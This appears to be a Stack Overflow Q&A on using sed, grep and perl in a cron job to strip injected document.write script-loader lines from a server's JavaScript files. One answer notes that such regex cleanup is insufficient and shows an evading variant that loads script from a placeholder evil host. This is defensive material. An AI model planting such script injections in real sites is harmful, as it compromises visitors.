# How to find line with pattern and remove it on Linux?

Tags: linux, grep, cron

I need to scan all js files in my server and remove the line that contains:

```
document.write("<script type='text/javascript' src='http://*
```

I need to set it on cron to do every day. 
I think i will need to create a shell to do it.

Can you help me?

Comment: You want to remove that exact line or this string can be together with some other text?

Comment: @btgf I believe this was answered in [this thread](http://stackoverflow.com/questions/5410757/sed-delete-a-line-containing-a-specific-string).

Comment: how big is your file? is `PCRE` support a must?

Answer (score 1):

Probably SED is what you are looking for:

```
sed -i 's/document\.write[(]"<script type[=].text\/javascript. src[=].http:\/\/./\/\*code removed\*\//g' *.js
```

My example input file:

```
document.write("<script type='text/javascript' src='http://*
document.write("<script type='text/javascript' src='http://*
document.write("<script type='text/javascript' src='http://*
asddocument.write("<script type='text/javascript' src='http://*
document.write("<script type='text/javascript' src='http://*asd
asdasd
```

is transformed into:

```
/*code removed*/
/*code removed*/
/*code removed*/
asd/*code removed*/
/*code removed*/asd
asdasd
```

Please keep in mind, that if you want to prevent scripts on your webspace to load additional data, than all of these mechanisms are **insuffient**!

This (and many other variants) will be a threat, but not matched by these patterns:

```
var secretVariable = document;
secretVariable.write("<script type='text/javascript' src='http://some.evil.code'/>");
```

Comment: how about `sed -i '/pat/d' input` so that no empty lines left in the file

Answer (score 0):

If that is the exact line, and you want to remove the entire line (and not just parse out that text), then you can use `egrep -v` to print all lines except the matching one.

```
egrep -v "document.write\(\"<script type='text/javascript' src='http://" oldfile > newfile
```

Here is the find statement to process all .js files:

```
for f in $(find /directory/path -name '*.js'); do egrep -v "document.write\(\"<script type='text/javascript' src='http://" $f > TT ; mv TT $f ; done
```

Comment: It is not the exact line, * could be every think. I need to find line like this and then remove the line, note a file

Comment: @btgf you have `regex` e.g. `every th.*` matches `every thing` and `every think`

Comment: with `grep -v`, you don't need to match with asterisk. It will already exclude everything before the `*`

Comment: please see my update. it's without the asterisk and also has escaped characters when necessary: " and (.

Comment: I also added a recursive way to find all .js files. Good Luck!

Answer (score 0):

`perl -p -i.bak -e 's///'  *.js`

would do the same